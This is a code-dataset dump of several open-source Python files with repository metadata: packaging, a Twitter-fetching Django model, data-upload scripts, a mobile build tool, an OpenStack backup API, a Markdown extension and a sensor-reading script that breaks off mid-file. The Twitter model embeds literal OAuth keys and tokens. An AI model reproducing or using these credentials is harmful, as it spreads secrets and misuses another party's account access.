repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
chrisdickinson/multipart
|
setup.py
|
1
|
1572
|
from distutils.core import setup
import os
# Stolen from django-registration
# Compile the list of packages available, because distutils doesn't have
# an easy way to do this.
packages, data_files = [], []
root_dir = os.path.dirname(__file__)
if root_dir:
os.chdir(root_dir)
for dirpath, dirnames, filenames in os.walk('multipart'):
# Ignore dirnames that start with '.'
for i, dirname in enumerate(dirnames):
if dirname.startswith('.'): del dirnames[i]
if '__init__.py' in filenames:
pkg = dirpath.replace(os.path.sep, '.')
if os.path.altsep:
pkg = pkg.replace(os.path.altsep, '.')
packages.append(pkg)
elif filenames:
prefix = dirpath[13:] # Strip "registration/" or "registration\"
for f in filenames:
data_files.append(os.path.join(prefix, f))
setup(
name='multipart',
version='0.1',
description='Two helper functions for creating multipart encoded bodies for httplib2',
author='Chris Dickinson',
author_email='chris.dickinson@domain51.com',
url='http://github.com/chrisdickinson/multipart/',
packages=packages,
package_data={'multipart': data_files},
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Utilities',
],
)
|
bsd-3-clause
| -832,142,934,570,517,000
| 32.446809
| 90
| 0.637405
| false
| 4.030769
| false
| false
| false
|
agepoly/mezzanine
|
mezzanine/twitter/models.py
|
1
|
6766
|
from __future__ import unicode_literals
from future.builtins import str
from datetime import datetime, timedelta
import re
from time import timezone
try:
from urllib.parse import quote
except ImportError:
# Python 2
from urllib import quote
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.html import urlize
from django.utils.timezone import get_default_timezone, make_aware
from django.utils.translation import ugettext_lazy as _
from requests_oauthlib import OAuth1
import requests
from mezzanine.conf import settings
from mezzanine.twitter import QUERY_TYPE_CHOICES, QUERY_TYPE_USER, \
QUERY_TYPE_LIST, QUERY_TYPE_SEARCH
from mezzanine.twitter import get_auth_settings
from mezzanine.twitter.managers import TweetManager
re_usernames = re.compile("@([0-9a-zA-Z+_]+)", re.IGNORECASE)
re_hashtags = re.compile("#([0-9a-zA-Z+_]+)", re.IGNORECASE)
replace_hashtags = "<a href=\"http://twitter.com/search?q=%23\\1\">#\\1</a>"
replace_usernames = "<a href=\"http://twitter.com/\\1\">@\\1</a>"
class TwitterQueryException(Exception):
pass
@python_2_unicode_compatible
class Query(models.Model):
type = models.CharField(_("Type"), choices=QUERY_TYPE_CHOICES,
max_length=10)
value = models.CharField(_("Value"), max_length=140)
interested = models.BooleanField("Interested", default=True)
class Meta:
verbose_name = _("Twitter query")
verbose_name_plural = _("Twitter queries")
ordering = ("-id",)
def __str__(self):
return "%s: %s" % (self.get_type_display(), self.value)
def run(self):
"""
Request new tweets from the Twitter API.
"""
try:
value = quote(self.value)
except KeyError:
value = self.value
urls = {
QUERY_TYPE_USER: ("https://api.twitter.com/1.1/statuses/"
"user_timeline.json?screen_name=%s"
"&include_rts=true" % value.lstrip("@")),
QUERY_TYPE_LIST: ("https://api.twitter.com/1.1/lists/statuses.json"
"?list_id=%s&include_rts=true" % value),
QUERY_TYPE_SEARCH: "https://api.twitter.com/1.1/search/tweets.json"
"?q=%s" % value,
}
try:
url = urls[self.type]
except KeyError:
raise TwitterQueryException("Invalid query type: %s" % self.type)
settings.use_editable()
auth_settings = get_auth_settings()
if not auth_settings:
from mezzanine.conf import registry
if self.value == registry["TWITTER_DEFAULT_QUERY"]["default"]:
# These are some read-only keys and secrets we use
# for the default query (eg nothing has been configured)
auth_settings = (
"KxZTRD3OBft4PP0iQW0aNQ",
"sXpQRSDUVJ2AVPZTfh6MrJjHfOGcdK4wRb1WTGQ",
"1368725588-ldWCsd54AJpG2xcB5nyTHyCeIC3RJcNVUAkB1OI",
"r9u7qS18t8ad4Hu9XVqmCGxlIpzoCN3e1vx6LOSVgyw3R",
)
else:
raise TwitterQueryException("Twitter OAuth settings missing")
try:
tweets = requests.get(url, auth=OAuth1(*auth_settings)).json()
except Exception as e:
raise TwitterQueryException("Error retrieving: %s" % e)
try:
raise TwitterQueryException(tweets["errors"][0]["message"])
except (IndexError, KeyError, TypeError):
pass
if self.type == "search":
tweets = tweets["statuses"]
for tweet_json in tweets:
remote_id = str(tweet_json["id"])
tweet, created = self.tweets.get_or_create(remote_id=remote_id)
if not created:
continue
if "retweeted_status" in tweet_json:
user = tweet_json['user']
tweet.retweeter_user_name = user["screen_name"]
tweet.retweeter_full_name = user["name"]
tweet.retweeter_profile_image_url = user["profile_image_url"]
tweet_json = tweet_json["retweeted_status"]
if self.type == QUERY_TYPE_SEARCH:
tweet.user_name = tweet_json['user']['screen_name']
tweet.full_name = tweet_json['user']['name']
tweet.profile_image_url = \
tweet_json['user']["profile_image_url"]
date_format = "%a %b %d %H:%M:%S +0000 %Y"
else:
user = tweet_json["user"]
tweet.user_name = user["screen_name"]
tweet.full_name = user["name"]
tweet.profile_image_url = user["profile_image_url"]
date_format = "%a %b %d %H:%M:%S +0000 %Y"
tweet.text = urlize(tweet_json["text"])
tweet.text = re_usernames.sub(replace_usernames, tweet.text)
tweet.text = re_hashtags.sub(replace_hashtags, tweet.text)
if getattr(settings, 'TWITTER_STRIP_HIGH_MULTIBYTE', False):
chars = [ch for ch in tweet.text if ord(ch) < 0x800]
tweet.text = ''.join(chars)
d = datetime.strptime(tweet_json["created_at"], date_format)
d -= timedelta(seconds=timezone)
tweet.created_at = make_aware(d, get_default_timezone())
try:
tweet.save()
except Warning:
pass
tweet.save()
self.interested = False
self.save()
class Tweet(models.Model):
remote_id = models.CharField(_("Twitter ID"), max_length=50)
created_at = models.DateTimeField(_("Date/time"), null=True)
text = models.TextField(_("Message"), null=True)
profile_image_url = models.URLField(_("Profile image URL"), null=True)
user_name = models.CharField(_("User name"), max_length=100, null=True)
full_name = models.CharField(_("Full name"), max_length=100, null=True)
retweeter_profile_image_url = models.URLField(
_("Profile image URL (Retweeted by)"), null=True)
retweeter_user_name = models.CharField(
_("User name (Retweeted by)"), max_length=100, null=True)
retweeter_full_name = models.CharField(
_("Full name (Retweeted by)"), max_length=100, null=True)
query = models.ForeignKey("Query", related_name="tweets")
objects = TweetManager()
class Meta:
verbose_name = _("Tweet")
verbose_name_plural = _("Tweets")
ordering = ("-created_at",)
def __str__(self):
return "%s: %s" % (self.user_name, self.text)
def is_retweet(self):
return self.retweeter_user_name is not None
|
bsd-2-clause
| 3,241,061,509,415,992,300
| 39.035503
| 79
| 0.585427
| false
| 3.736057
| false
| false
| false
|
arcolife/scholarec
|
corpus/dumps/data_handler.py
|
1
|
2830
|
#!/usr/bin/python
import os
import sys
import json
from subprocess import call
# path of directory containing all .json files
PATH_SOURCE = './data_arxiv_json/'
PATH_DEST = './sharded/'
def __write_json_files(path_source, path_dest, keyword):
'''
Create json chunks from a previous db dump (.json)
'''
# load dump
data = json.loads(open(path_source+'query_results'+keyword+'.json','rb').read())
for key in data.keys():
temp = data[key]
temp['ID'] = key.split('/')[-1]
temp['keyword'] = keyword
#jEncoder = json.JSONEncoder()
f = open(path_dest +temp['ID']+'.json','wb')
json.dump(temp, f)
f.close()
def __write_es_upload_script(path_dest):
'''
write content into bash script that
is supposed to upload chunks to ElasticSearch instance
'''
#list of all json filenames
filenames = os.listdir(path_dest)
FILE = open('es_upload', 'wb')
# write shell commands
FILE.write('#!/bin/bash\n')
FILE.write('cd ' + path_dest + '\n')
for filename in filenames:
# develop a command to upload files
CMD = ['curl','-XPOST',"'http://localhost:9200/arxiv/docs/" \
#+ filename.strip('.json') \
+ "'",'-d ','@'+filename]
FILE.write(' '.join(CMD) +"\n")
#call(CMD)
#print CMD
FILE.close()
def __write_mongo_upload_script(path_dest):
'''
write content into bash script that
is supposed to upload chunks to mongodb instance
'''
#list of all json filenames
filenames = os.listdir(path_dest)
FILE = open('mongo_upload', 'wb')
# write shell commands
FILE.write('#!/bin/bash\n')
FILE.write('cd ' + path_dest + ' \n')
passw = os.environ.get('mongo_scholarec_p')
for filename in filenames:
# develop a command to upload files
FILE.write('mongoimport --db scholarec -u arco -p ' + passw + ' --collection docs --file '+ \
filename + "\n")
#+ filename.strip('.json') \
FILE.close()
if __name__=='__main__':
'''
try:
# creat directory to dump individual json files
os.mkdir(PATH_DEST)
file_ = open('searchWords.lst', 'rb')
import ast
keywords = ast.literal_eval(file_.read())
file_.close()
for word in keywords:
__write_json_files(PATH_SOURCE, PATH_DEST, word)
except OSError:
print "Error: ", sys.exc_info()[1][1]
__write_es_upload_script(PATH_DEST)
'''
__write_mongo_upload_script(PATH_DEST)
'''
# set executable permission to shell script: ./_User_sharded/post
set_perm = ['chmod', '+x', 'es_upload']
call(set_perm)
# execute the script and upload json fiels to ES instance
call_post = ['./es_upload']
call(call_post)
'''
|
gpl-3.0
| -9,152,104,286,490,961,000
| 30.098901
| 101
| 0.579152
| false
| 3.600509
| false
| false
| false
|
caspahouzer/TiShineLabel
|
build.py
|
1
|
8791
|
#!/usr/bin/env python
#
# Appcelerator Titanium Module Packager
#
#
import os, subprocess, sys, glob, string, optparse, subprocess
import zipfile
from datetime import date
cwd = os.path.abspath(os.path.dirname(sys._getframe(0).f_code.co_filename))
os.chdir(cwd)
required_module_keys = ['name','version','moduleid','description','copyright','license','copyright','platform','minsdk']
module_defaults = {
'description':'My module',
'author': 'Your Name',
'license' : 'Specify your license',
'copyright' : 'Copyright (c) %s by Your Company' % str(date.today().year),
}
module_license_default = "TODO: place your license here and we'll include it in the module distribution"
def find_sdk(config):
sdk = config['TITANIUM_SDK']
return os.path.expandvars(os.path.expanduser(sdk))
def replace_vars(config,token):
idx = token.find('$(')
while idx != -1:
idx2 = token.find(')',idx+2)
if idx2 == -1: break
key = token[idx+2:idx2]
if not config.has_key(key): break
token = token.replace('$(%s)' % key, config[key])
idx = token.find('$(')
return token
def read_ti_xcconfig():
contents = open(os.path.join(cwd,'titanium.xcconfig')).read()
config = {}
for line in contents.splitlines(False):
line = line.strip()
if line[0:2]=='//': continue
idx = line.find('=')
if idx > 0:
key = line[0:idx].strip()
value = line[idx+1:].strip()
config[key] = replace_vars(config,value)
return config
def generate_doc(config):
docdir = os.path.join(cwd,'documentation')
if not os.path.exists(docdir):
warn("Couldn't find documentation file at: %s" % docdir)
return None
try:
import markdown2 as markdown
except ImportError:
import markdown
documentation = []
for file in os.listdir(docdir):
if file in ignoreFiles or os.path.isdir(os.path.join(docdir, file)):
continue
md = open(os.path.join(docdir,file)).read()
html = markdown.markdown(md)
documentation.append({file:html});
return documentation
def compile_js(manifest,config):
js_file = os.path.join(cwd,'assets','com.lightapps.TiShineLabel.js')
if not os.path.exists(js_file): return
from compiler import Compiler
try:
import json
except:
import simplejson as json
compiler = Compiler(cwd, manifest['moduleid'], manifest['name'], 'commonjs')
root_asset, module_assets = compiler.compile_module()
root_asset_content = """
%s
return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[0]);
""" % root_asset
module_asset_content = """
%s
NSNumber *index = [map objectForKey:path];
if (index == nil) {
return nil;
}
return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[index.integerValue]);
""" % module_assets
from tools import splice_code
assets_router = os.path.join(cwd,'Classes','ComLightappsTiShineLabelModuleAssets.m')
splice_code(assets_router, 'asset', root_asset_content)
splice_code(assets_router, 'resolve_asset', module_asset_content)
# Generate the exports after crawling all of the available JS source
exports = open('metadata.json','w')
json.dump({'exports':compiler.exports }, exports)
exports.close()
def die(msg):
print msg
sys.exit(1)
def info(msg):
print "[INFO] %s" % msg
def warn(msg):
print "[WARN] %s" % msg
def validate_license():
c = open(os.path.join(cwd,'LICENSE')).read()
if c.find(module_license_default)!=-1:
warn('please update the LICENSE file with your license text before distributing')
def validate_manifest():
path = os.path.join(cwd,'manifest')
f = open(path)
if not os.path.exists(path): die("missing %s" % path)
manifest = {}
for line in f.readlines():
line = line.strip()
if line[0:1]=='#': continue
if line.find(':') < 0: continue
key,value = line.split(':')
manifest[key.strip()]=value.strip()
for key in required_module_keys:
if not manifest.has_key(key): die("missing required manifest key '%s'" % key)
if module_defaults.has_key(key):
defvalue = module_defaults[key]
curvalue = manifest[key]
if curvalue==defvalue: warn("please update the manifest key: '%s' to a non-default value" % key)
return manifest,path
ignoreFiles = ['.DS_Store','.gitignore','libTitanium.a','titanium.jar','README']
ignoreDirs = ['.DS_Store','.svn','.git','CVSROOT']
def zip_dir(zf,dir,basepath,ignoreExt=[]):
if not os.path.exists(dir): return
for root, dirs, files in os.walk(dir):
for name in ignoreDirs:
if name in dirs:
dirs.remove(name) # don't visit ignored directories
for file in files:
if file in ignoreFiles: continue
e = os.path.splitext(file)
if len(e) == 2 and e[1] in ignoreExt: continue
from_ = os.path.join(root, file)
to_ = from_.replace(dir, '%s/%s'%(basepath,dir), 1)
zf.write(from_, to_)
def glob_libfiles():
files = []
for libfile in glob.glob('build/**/*.a'):
if libfile.find('Release-')!=-1:
files.append(libfile)
return files
def build_module(manifest,config):
from tools import ensure_dev_path
ensure_dev_path()
rc = os.system("xcodebuild -sdk iphoneos -configuration Release")
if rc != 0:
die("xcodebuild failed")
rc = os.system("xcodebuild -sdk iphonesimulator -configuration Release")
if rc != 0:
die("xcodebuild failed")
# build the merged library using lipo
moduleid = manifest['moduleid']
libpaths = ''
for libfile in glob_libfiles():
libpaths+='%s ' % libfile
os.system("lipo %s -create -output build/lib%s.a" %(libpaths,moduleid))
def generate_apidoc(apidoc_build_path):
global options
if options.skip_docs:
info("Skipping documentation generation.")
return False
else:
info("Module apidoc generation can be skipped using --skip-docs")
apidoc_path = os.path.join(cwd, "apidoc")
if not os.path.exists(apidoc_path):
warn("Skipping apidoc generation. No apidoc folder found at: %s" % apidoc_path)
return False
if not os.path.exists(apidoc_build_path):
os.makedirs(apidoc_build_path)
ti_root = string.strip(subprocess.check_output(["echo $TI_ROOT"], shell=True))
if not len(ti_root) > 0:
warn("Not generating documentation from the apidoc folder. The titanium_mobile repo could not be found.")
warn("Set the TI_ROOT environment variable to the parent folder where the titanium_mobile repo resides (eg.'export TI_ROOT=/Path').")
return False
docgen = os.path.join(ti_root, "titanium_mobile", "apidoc", "docgen.py")
if not os.path.exists(docgen):
warn("Not generating documentation from the apidoc folder. Couldn't find docgen.py at: %s" % docgen)
return False
info("Generating documentation from the apidoc folder.")
rc = os.system("\"%s\" --format=jsca,modulehtml --css=styles.css -o \"%s\" -e \"%s\"" % (docgen, apidoc_build_path, apidoc_path))
if rc != 0:
die("docgen failed")
return True
def package_module(manifest,mf,config):
name = manifest['name'].lower()
moduleid = manifest['moduleid'].lower()
version = manifest['version']
modulezip = '%s-iphone-%s.zip' % (moduleid,version)
if os.path.exists(modulezip): os.remove(modulezip)
zf = zipfile.ZipFile(modulezip, 'w', zipfile.ZIP_DEFLATED)
modulepath = 'modules/iphone/%s/%s' % (moduleid,version)
zf.write(mf,'%s/manifest' % modulepath)
libname = 'lib%s.a' % moduleid
zf.write('build/%s' % libname, '%s/%s' % (modulepath,libname))
docs = generate_doc(config)
if docs!=None:
for doc in docs:
for file, html in doc.iteritems():
filename = string.replace(file,'.md','.html')
zf.writestr('%s/documentation/%s'%(modulepath,filename),html)
apidoc_build_path = os.path.join(cwd, "build", "apidoc")
if generate_apidoc(apidoc_build_path):
for file in os.listdir(apidoc_build_path):
if file in ignoreFiles or os.path.isdir(os.path.join(apidoc_build_path, file)):
continue
zf.write(os.path.join(apidoc_build_path, file), '%s/documentation/apidoc/%s' % (modulepath, file))
zip_dir(zf,'assets',modulepath,['.pyc','.js'])
zip_dir(zf,'example',modulepath,['.pyc'])
zip_dir(zf,'platform',modulepath,['.pyc','.js'])
zf.write('LICENSE','%s/LICENSE' % modulepath)
zf.write('module.xcconfig','%s/module.xcconfig' % modulepath)
exports_file = 'metadata.json'
if os.path.exists(exports_file):
zf.write(exports_file, '%s/%s' % (modulepath, exports_file))
zf.close()
if __name__ == '__main__':
global options
parser = optparse.OptionParser()
parser.add_option("-s", "--skip-docs",
dest="skip_docs",
action="store_true",
help="Will skip building documentation in apidoc folder",
default=False)
(options, args) = parser.parse_args()
manifest,mf = validate_manifest()
validate_license()
config = read_ti_xcconfig()
sdk = find_sdk(config)
sys.path.insert(0,os.path.join(sdk,'iphone'))
sys.path.append(os.path.join(sdk, "common"))
compile_js(manifest,config)
build_module(manifest,config)
package_module(manifest,mf,config)
sys.exit(0)
|
mit
| 4,717,175,354,227,685,000
| 30.967273
| 135
| 0.694574
| false
| 2.963924
| true
| false
| false
|
hall1467/wikidata_usage_tracking
|
python_analysis_scripts/longitudinal_misalignment/alignment_and_misalignment_table_pre_processor.py
|
1
|
2373
|
"""
Preprocess alignment and misalignment data so that it can be imported into
Postgres
Usage:
alignment_and_misalignment_table_pre_processor (-h|--help)
alignment_and_misalignment_table_pre_processor <output> <input_alignment_data>...
[--debug]
[--verbose]
Options:
-h, --help This help message is printed
<input_alignment_data> Path to file to process.
<output> Where output will be written
--debug Print debug logging to stderr
--verbose Print dots and stuff to stderr
"""
import docopt
import logging
import operator
from collections import defaultdict
import mysqltsv
import bz2
import re
from collections import defaultdict
import sys
logger = logging.getLogger(__name__)
MISALIGNMENT_FILE_RE =\
re.compile(r'.*\/(\d\d\d\d\d\d)_misaligned\.tsv')
ALIGNMENT_FILE_RE =\
re.compile(r'.*\/(\d\d\d\d\d\d)_aligned\.tsv')
def main(argv=None):
args = docopt.docopt(__doc__)
logging.basicConfig(
level=logging.INFO if not args['--debug'] else logging.DEBUG,
format='%(asctime)s %(levelname)s:%(name)s -- %(message)s'
)
input_alignment_data = args['<input_alignment_data>']
output_file = mysqltsv.Writer(open(args['<output>'], "w"))
verbose = args['--verbose']
run(input_alignment_data, output_file, verbose)
def run(input_alignment_data, output_file, verbose):
for f in input_alignment_data:
if verbose:
sys.stderr.write("Processing: {0}\n".format(f))
sys.stderr.flush()
if MISALIGNMENT_FILE_RE.match(f):
date = MISALIGNMENT_FILE_RE.match(f).group(1)
file_type = "ma"
elif ALIGNMENT_FILE_RE.match(f):
date = ALIGNMENT_FILE_RE.match(f).group(1)
file_type = "a"
else:
raise RuntimeError("Incorrect filename: {0}".format(f))
for i, line in enumerate(mysqltsv.Reader(open(f, "r"), headers=False,
types=[str, str, str])):
output_file.write([line[0], int(date[0:4]), int(date[4:6]), line[2],
line[1]])
if verbose and i % 10000 == 0 and i != 0:
sys.stderr.write("\tEntities processed: {0}\n".format(i))
sys.stderr.flush()
main()
|
mit
| -126,529,642,722,674,400
| 26.275862
| 85
| 0.585335
| false
| 3.62844
| false
| false
| false
|
NeCTAR-RC/cinder
|
cinder/backup/api.py
|
1
|
11074
|
# Copyright (C) 2012 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Handles all requests relating to the volume backups service.
"""
from eventlet import greenthread
from oslo.config import cfg
from cinder.backup import rpcapi as backup_rpcapi
from cinder import context
from cinder.db import base
from cinder import exception
from cinder.openstack.common import log as logging
from cinder import utils
import cinder.policy
import cinder.volume
from cinder.volume import utils as volume_utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
def check_policy(context, action):
target = {
'project_id': context.project_id,
'user_id': context.user_id,
}
_action = 'backup:%s' % action
cinder.policy.enforce(context, _action, target)
class API(base.Base):
"""API for interacting with the volume backup manager."""
def __init__(self, db_driver=None):
self.backup_rpcapi = backup_rpcapi.BackupAPI()
self.volume_api = cinder.volume.API()
super(API, self).__init__(db_driver)
def get(self, context, backup_id):
check_policy(context, 'get')
rv = self.db.backup_get(context, backup_id)
return dict(rv.iteritems())
def delete(self, context, backup_id):
"""Make the RPC call to delete a volume backup."""
check_policy(context, 'delete')
backup = self.get(context, backup_id)
if backup['status'] not in ['available', 'error']:
msg = _('Backup status must be available or error')
raise exception.InvalidBackup(reason=msg)
self.db.backup_update(context, backup_id, {'status': 'deleting'})
self.backup_rpcapi.delete_backup(context,
backup['host'],
backup['id'])
# TODO(moorehef): Add support for search_opts, discarded atm
def get_all(self, context, search_opts=None):
if search_opts is None:
search_opts = {}
check_policy(context, 'get_all')
if context.is_admin:
backups = self.db.backup_get_all(context)
else:
backups = self.db.backup_get_all_by_project(context,
context.project_id)
return backups
def _is_backup_service_enabled(self, volume, volume_host):
"""Check if there is a backup service available."""
topic = CONF.backup_topic
ctxt = context.get_admin_context()
services = self.db.service_get_all_by_topic(ctxt, topic)
for srv in services:
if (srv['availability_zone'] == volume['availability_zone'] and
srv['host'] == volume_host and not srv['disabled'] and
utils.service_is_up(srv)):
return True
return False
def _list_backup_services(self):
"""List all enabled backup services.
:returns: list -- hosts for services that are enabled for backup.
"""
topic = CONF.backup_topic
ctxt = context.get_admin_context()
services = self.db.service_get_all_by_topic(ctxt, topic)
return [srv['host'] for srv in services if not srv['disabled']]
def create(self, context, name, description, volume_id,
container, availability_zone=None):
"""Make the RPC call to create a volume backup."""
check_policy(context, 'create')
volume = self.volume_api.get(context, volume_id)
if volume['status'] != "available":
msg = _('Volume to be backed up must be available')
raise exception.InvalidVolume(reason=msg)
volume_host = volume_utils.extract_host(volume['host'], 'host')
if not self._is_backup_service_enabled(volume, volume_host):
raise exception.ServiceNotFound(service_id='cinder-backup')
self.db.volume_update(context, volume_id, {'status': 'backing-up'})
options = {'user_id': context.user_id,
'project_id': context.project_id,
'display_name': name,
'display_description': description,
'volume_id': volume_id,
'status': 'creating',
'container': container,
'size': volume['size'],
'host': volume_host, }
backup = self.db.backup_create(context, options)
#TODO(DuncanT): In future, when we have a generic local attach,
# this can go via the scheduler, which enables
# better load balancing and isolation of services
self.backup_rpcapi.create_backup(context,
backup['host'],
backup['id'],
volume_id)
return backup
def restore(self, context, backup_id, volume_id=None):
"""Make the RPC call to restore a volume backup."""
check_policy(context, 'restore')
backup = self.get(context, backup_id)
if backup['status'] != 'available':
msg = _('Backup status must be available')
raise exception.InvalidBackup(reason=msg)
size = backup['size']
if size is None:
msg = _('Backup to be restored has invalid size')
raise exception.InvalidBackup(reason=msg)
# Create a volume if none specified. If a volume is specified check
# it is large enough for the backup
if volume_id is None:
name = 'restore_backup_%s' % backup_id
description = 'auto-created_from_restore_from_backup'
LOG.audit(_("Creating volume of %(size)s GB for restore of "
"backup %(backup_id)s"),
{'size': size, 'backup_id': backup_id},
context=context)
volume = self.volume_api.create(context, size, name, description)
volume_id = volume['id']
while True:
volume = self.volume_api.get(context, volume_id)
if volume['status'] != 'creating':
break
greenthread.sleep(1)
else:
volume = self.volume_api.get(context, volume_id)
if volume['status'] != "available":
msg = _('Volume to be restored to must be available')
raise exception.InvalidVolume(reason=msg)
LOG.debug('Checking backup size %s against volume size %s',
size, volume['size'])
if size > volume['size']:
msg = (_('volume size %(volume_size)d is too small to restore '
'backup of size %(size)d.') %
{'volume_size': volume['size'], 'size': size})
raise exception.InvalidVolume(reason=msg)
LOG.audit(_("Overwriting volume %(volume_id)s with restore of "
"backup %(backup_id)s"),
{'volume_id': volume_id, 'backup_id': backup_id},
context=context)
# Setting the status here rather than setting at start and unrolling
# for each error condition, it should be a very small window
self.db.backup_update(context, backup_id, {'status': 'restoring'})
self.db.volume_update(context, volume_id, {'status':
'restoring-backup'})
self.backup_rpcapi.restore_backup(context,
backup['host'],
backup['id'],
volume_id)
d = {'backup_id': backup_id,
'volume_id': volume_id, }
return d
def export_record(self, context, backup_id):
"""Make the RPC call to export a volume backup.
Call backup manager to execute backup export.
:param context: running context
:param backup_id: backup id to export
:returns: dictionary -- a description of how to import the backup
:returns: contains 'backup_url' and 'backup_service'
:raises: InvalidBackup
"""
check_policy(context, 'backup-export')
backup = self.get(context, backup_id)
if backup['status'] != 'available':
msg = (_('Backup status must be available and not %s.') %
backup['status'])
raise exception.InvalidBackup(reason=msg)
LOG.debug("Calling RPCAPI with context: "
"%(ctx)s, host: %(host)s, backup: %(id)s.",
{'ctx': context,
'host': backup['host'],
'id': backup['id']})
export_data = self.backup_rpcapi.export_record(context,
backup['host'],
backup['id'])
return export_data
def import_record(self, context, backup_service, backup_url):
"""Make the RPC call to import a volume backup.
:param context: running context
:param backup_service: backup service name
:param backup_url: backup description to be used by the backup driver
:raises: InvalidBackup
:raises: ServiceNotFound
"""
check_policy(context, 'backup-import')
# NOTE(ronenkat): since we don't have a backup-scheduler
# we need to find a host that support the backup service
# that was used to create the backup.
# We send it to the first backup service host, and the backup manager
# on that host will forward it to other hosts on the hosts list if it
# cannot support correct service itself.
hosts = self._list_backup_services()
if len(hosts) == 0:
raise exception.ServiceNotFound(service_id=backup_service)
options = {'user_id': context.user_id,
'project_id': context.project_id,
'volume_id': '0000-0000-0000-0000',
'status': 'creating', }
backup = self.db.backup_create(context, options)
first_host = hosts.pop()
self.backup_rpcapi.import_record(context,
first_host,
backup['id'],
backup_service,
backup_url,
hosts)
return backup
|
apache-2.0
| -4,439,977,846,825,401,300
| 39.123188
| 78
| 0.559689
| false
| 4.503457
| false
| false
| false
|
zestedesavoir/Python-ZMarkdown
|
zmarkdown/extensions/urlize.py
|
1
|
2230
|
# Inspired by https://github.com/r0wb0t/markdown-urlize/blob/master/urlize.py
from __future__ import unicode_literals
from zmarkdown.inlinepatterns import Pattern as InlinePattern, sanitize_url, MAIL_RE
from zmarkdown import Extension, util
try: # pragma: no cover
from urllib.parse import urlparse
except ImportError: # pragma: no cover
from urlparse import urlparse
import re
# Global Vars. Do not catch ending dot
URLIZE_RE = r'(^|(?<=\s))({0})(?=\.?(\s|$))'.format("|".join((
# mail adress (two lines):
MAIL_RE,
# Anything with protocol between < >
r"<(?:f|ht)tps?://[^>]*>",
# with protocol : any valid domain match.
r"((?:f|ht)tps?://)([\da-z\.-]+)\.([a-z\.]{1,5}[a-z])([/\w\.$%&_?#=()'-]*[/\w$%&_?#=()'-])?\/?",
# without protocol, only somes specified protocols match
r"((?:f|ht)tps?://)?([\da-z\.-]+)\.(?:com|net|org|fr)([/\w\.$%&_?#=()'-]*[/\w$%&_?#=()'-])?\/?")))
class UrlizePattern(InlinePattern):
""" Return a link Element given an autolink (`http://example/com`). """
def __init__(self, *args, **kwargs):
kwargs["not_in"] = ('link',)
InlinePattern.__init__(self, *args, **kwargs)
def handleMatch(self, m):
url = m.group(3)
if url.startswith('<'):
url = url[1:-1]
text = url
is_url = re.match(MAIL_RE, url)
if not is_url:
url = sanitize_url(url)
parts = urlparse(url)
# If no protocol (and not explicit relative link), add one
if parts[0] == "":
if is_url:
url = 'mailto:' + url
elif not url.startswith("#") and not url.startswith("/"):
url = 'http://' + url
el = util.etree.Element("a")
el.set('href', url)
el.text = util.AtomicString(text)
return el
class UrlizeExtension(Extension):
""" Urlize Extension for Python-Markdown. """
def extendZMarkdown(self, md, md_globals):
""" Replace autolink with UrlizePattern """
md.inlinePatterns['autolink'] = UrlizePattern(URLIZE_RE, md)
def makeExtension(*args, **kwargs):
return UrlizeExtension(*args, **kwargs)
|
bsd-3-clause
| -4,029,473,678,313,161,700
| 30.794118
| 102
| 0.54574
| false
| 3.36858
| false
| false
| false
|
paritoshsingh/konehack
|
read_and_send_msg.py
|
1
|
2879
|
#!/usr/bin/python
import smbus
import math
import paho.mqtt.client as mqtt
# Power management registers
power_mgmt_1 = 0x6b
power_mgmt_2 = 0x6c
def read_byte(adr):
return bus.read_byte_data(address, adr)
def read_word(adr):
high = bus.read_byte_data(address, adr)
low = bus.read_byte_data(address, adr+1)
val = (high << 8) + low
return val
def read_word_2c(adr):
val = read_word(adr)
if (val >= 0x8000):
return -((65535 - val) + 1)
else:
return val
def dist(a,b):
return math.sqrt((a*a)+(b*b))
def get_y_rotation(x,y,z):
radians = math.atan2(x, dist(y,z))
return -math.degrees(radians)
def get_x_rotation(x,y,z):
radians = math.atan2(y, dist(x,z))
return math.degrees(radians)
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
print("Connected with result code "+str(rc))
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
print(msg.topic+" "+str(msg.payload))
bus = smbus.SMBus(1) # or bus = smbus.SMBus(1) for Revision 2 boards
address = 0x68 # This is the address value read via the i2cdetect command
# Now wake the 6050 up as it starts in sleep mode
bus.write_byte_data(address, power_mgmt_1, 0)
while 1:
# print "gyro data"
# print "---------"
gyro_xout = read_word_2c(0x43)
gyro_yout = read_word_2c(0x45)
gyro_zout = read_word_2c(0x47)
print "gyro_xout: ", gyro_xout, " scaled: ", (gyro_xout / 131)
print "gyro_yout: ", gyro_yout, " scaled: ", (gyro_yout / 131)
print "gyro_zout: ", gyro_zout, " scaled: ", (gyro_zout / 131)
# print
# print "accelerometer data"
# print "------------------"
accel_xout = read_word_2c(0x3b)
accel_yout = read_word_2c(0x3d)
accel_zout = read_word_2c(0x3f)
accel_xout_scaled = accel_xout / 16384.0
accel_yout_scaled = accel_yout / 16384.0
